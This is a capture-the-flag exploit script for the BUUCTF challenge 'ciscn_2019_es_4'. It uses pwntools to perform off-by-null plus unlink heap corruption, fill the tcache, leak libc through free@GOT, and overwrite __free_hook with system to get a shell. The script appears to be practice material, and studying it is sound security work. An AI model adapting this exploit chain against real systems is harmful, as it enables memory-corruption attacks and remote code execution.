BUUCTF ciscn_2019_es_4

Technique: off-by-null + unlink

from pwn import *
context.arch = 'amd64'
# Debug-level logging echoes every byte sent and received, which is what makes
# the prompt-driven interaction below easy to follow (and very noisy).
context.log_level = 'debug'

# Local run of the challenge binary; the remote line is kept commented so the
# same script can be pointed at the challenge server by swapping the two.
s = process('./ciscn_2019_es_4')
#s = remote('node4.buuoj.cn',25370)
# Symbol sources: the libc build matching the challenge (2.27 per the path) for
# free/system/__free_hook offsets, and the binary itself for its GOT.
libc = ELF('./glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc-2.27.so')
elf = ELF('./ciscn_2019_es_4')

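def add(index: int, size: int, content: bytes) -> None:
    """Menu option 1: allocate slot *index* with *size* bytes and fill it with *content*.

    *content* goes through ``sendafter`` (no trailing newline), so it arrives
    exactly as given. *index* and *size* are encoded explicitly so that every
    value handed to the tube is ``bytes``, matching the prompt literals, rather
    than relying on pwntools' implicit str handling.
    """
    s.sendlineafter(b'4.show\n', b'1')
    s.sendlineafter(b'index:\n', str(index).encode())
    s.sendlineafter(b'size:\n', str(size).encode())
    s.sendafter(b'content:\n', content)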

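def delete(index: int) -> None:
    """Menu option 2: free the chunk held in slot *index*.

    The index is encoded explicitly so both values sent to the tube are
    ``bytes``, consistent with the prompt literals.
    """
    s.sendlineafter(b'4.show\n', b'2')
    s.sendlineafter(b'index:\n', str(index).encode())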

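def edit(index: int, content: bytes) -> None:
    """Menu option 3: overwrite the contents of slot *index* with *content*.

    *content* is sent with ``sendafter`` (no newline appended) so the bytes
    written are exactly the payload built by the caller. The index is encoded
    explicitly so every argument reaching the tube is ``bytes``.
    """
    s.sendlineafter(b'4.show\n', b'3')
    s.sendlineafter(b'index:\n', str(index).encode())
    s.sendafter(b'content:\n', content)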

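def show(index: int) -> None:
    """Menu option 4: ask the binary to print the contents of slot *index*.

    Nothing is read back here; the caller consumes the output (see the
    libc-leak step below). The index is encoded explicitly so both values sent
    are ``bytes``.
    """
    s.sendlineafter(b'4.show\n', b'4')
    s.sendlineafter(b'index:\n', str(index).encode())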

# Unlink target: entry 7 of an 8-byte-per-slot table at 0x6020E0 (slot 7 is the
# chunk whose contents get edited below).
# NOTE(review): that 0x6020E0 is the binary's chunk-pointer array is inferred
# from the slot arithmetic and the later edits — confirm against the binary.
target = 0x6020E0 + 8 * 7
# fd/bk for the fake chunk, placed relative to target as the unlink technique
# named in the title requires. target - 0x18 == 0x6020E0 + 8 * 4, i.e. entry 4.
fd = target - 0x18
bk = target - 0x10

# Written into slots 4 and 5 later; what "key2" guards is not visible here.
key2_addr = 0x6022B8

# Seven same-size allocations, all freed together further down. With the 2.27
# libc named above this presumably fills the tcache bin for that size so the
# later free of chunk 8 takes the non-tcache path — TODO confirm.
for i in range(7):
    add(i , 0xf0 , b'a') # 0-6

# Equivalent to add(7, 0x88, b'a'), done by hand so the 'gift: ' line the
# binary prints between the size and content prompts can be consumed: seven
# hex digits of a heap address.
s.sendlineafter(b'4.show\n' , b'1')
s.sendlineafter(b'index:\n' , str(7))
s.sendlineafter(b'size:\n' , str(0x88))
s.recvuntil(b'gift: ')
heap_addr = int(s.recv(7),16)
success('heap_addr=>' + hex(heap_addr))
s.sendafter(b'content:\n' , b'a') # 7

add(8 , 0xf0 , b'a') # 8  sits directly after chunk 7; freed to trigger the unlink
add(9 , 0x80 , b'a') # 9
add(10 , 0x80 , b'a') # 10
add(11 , 0x80 , b'/bin/sh\x00') # 11  freed last, once the hook is in place

for i in range(7):
    delete(i)


# Fake chunk written into slot 7: prev_size 0, size 0x81, the fd/bk pair from
# above, zero padding, then 0x80 as the following chunk's prev_size. The total
# is 0x88 bytes — exactly the size requested for slot 7 — so the off-by-null
# from the title presumably lands on the low byte of chunk 8's size field.
payload = p64(0) + p64(0x81)
payload+= p64(fd) + p64(bk)
payload+= b'\x00'*0x60
payload+= p64(0x80)

edit(7 , payload)
# Freeing chunk 8 is the step that consolidates backwards into the fake chunk.
delete(8)

# After the unlink, slot 7 is expected to point at entry 4 of the table
# (target - 0x18), so editing slot 7 rewrites entries 4..7: two copies of a
# heap pointer, free@GOT (read back via show(6) below) and 0x602100, which
# keeps entry 7 aimed at entry 4 for the final edits.
payload = p64(heap_addr + 0x190) + p64(heap_addr + 0x190)
payload+= p64(elf.got['free']) + p64(0x602100)

edit(7 , payload)

# Entries 4 and 5 now hold the same heap pointer, so these two deletes free one
# chunk twice; the two re-allocations write key2_addr into it and the third
# write of 0xfffffff presumably lands at key2_addr — what the binary checks
# there is not visible in this script; confirm against the binary.
delete(4)
delete(5)

add(4 , 0x80 , p64(key2_addr)) # 4
add(5 , 0x80 , p64(key2_addr)) # 5
add(8 , 0x80 , p64(0xfffffff)) # 8

# Entry 6 holds free@GOT, so showing slot 6 prints the resolved address of
# free(); keep the six significant bytes ending in the 0x7f high byte and
# subtract free's libc offset to get the base.
show(6)
libc_base = u64(s.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) - libc.sym['free']
success('libc_base=>' + hex(libc_base))
system_addr = libc_base + libc.sym['system']
__free_hook = libc_base + libc.sym['__free_hook']


# Slot 7 still aliases entry 4: point entry 4 at __free_hook, write system
# through it, then free the '/bin/sh' chunk so the hooked free() invokes it.
edit(7 , p64(__free_hook))
edit(4 , p64(system_addr))
delete(11)

#gdb.attach(s)
s.interactive()

 
